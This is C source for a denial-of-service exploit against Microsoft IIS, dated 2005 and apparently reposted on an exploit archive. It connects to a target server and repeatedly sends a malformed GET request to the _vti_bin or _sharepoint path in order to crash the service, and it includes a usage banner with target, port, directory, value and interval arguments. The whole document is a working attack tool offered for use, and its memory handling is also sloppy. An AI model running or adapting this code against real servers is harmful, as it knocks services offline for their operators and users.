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MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp)
===================================================================== MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp) ===================================================================== /* Name: Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint) Exploit File: Microsoft.IIS.Malformed.URI.DoS.(_vti_bin,_sharepoint).cpp Author: Lympex Contact: .- Mail: lympex[at]gmail[dot]com .- Web: http://l-bytes.tk Date: 20/12/2005 Info: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #pragma comment(lib,"libws2_32.a") SOCKET Connect(char *Host, short Port) { /*make the socket*/ WSADATA wsaData; SOCKET Winsock; /*structs*/ struct sockaddr_in Winsock_In; struct hostent *Ip; /*init*/ WSAStartup(MAKEWORD(2,2), &wsaData); /*asociate*/ Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); //check the socket if(Winsock==INVALID_SOCKET) { /*exit*/ WSACleanup(); return 1; } /*complete the struct*/ Ip=gethostbyname(Host); Winsock_In.sin_port=htons(Port); Winsock_In.sin_family=AF_INET; Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr))); /*connection*/ if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { /*exit*/ WSACleanup(); return 1; } return Winsock; } /*****************/ /* MAIN FUNCTION */ /*****************/ int main(int argc, char *argv[]) { printf("\n*******************************************************************"); printf("\n* Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint) Exploit *"); printf("\n*-----------------------------------------------------------------*"); printf("\n* Coded by Lympex: lympex[at]gmail[dot]com && http://l-bytes.tk *"); printf("\n* Info: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html *"); printf("\n*******************************************************************\n"); if(argc!=6) { printf("\n[+] Usage: %s <server.com> <port> <directory> <value> <interval(ms)>",argv[0]); printf("\n[+] Directories: \x22_vti_bin\x22 / \x22_sharepoint\x22"); printf("\n (Directory must be set to \x22Scripts & Executables\x22"); printf("\n[+] Values: ~0, ~1, ~2, ~3, ~4, ~5, ~6, ~7, ~8, ~9\n"); return -1; } BOOL Done=FALSE; unsigned int i; SOCKET DoS; char *Request; printf("\n[+] Doing DoS Attack..."); Request=(char *)malloc((strlen("GET /")+strlen(argv[3])+strlen(argv[4])+strlen("/.dll/*\\\n\n"))*sizeof(char)); memset(Request,0,sizeof(Request)); //copy the request strcpy(Request,"GET /");strcat(Request,argv[3]);strcat(Request,"/.dll/*\\");strcat(Request,argv[4]);strcat(Request,"\n\n"); //make a bucle to do the attack for(i=0;i<5;i++) { DoS=Connect(argv[1],(short)atoi(argv[2])); //check the socket if(DoS==1) { Done=FALSE; break; } send(DoS,Request,strlen(Request),0); Sleep(100); WSACleanup(); //check if(i==4) { Done=TRUE; } Sleep((DWORD)atoi(argv[5])); } //check again if(Done==TRUE) { printf("DONE"); }else{ printf("ERROR - Server down?"); } LocalFree(Request); return 0; } # 0day.today [2024-12-26] #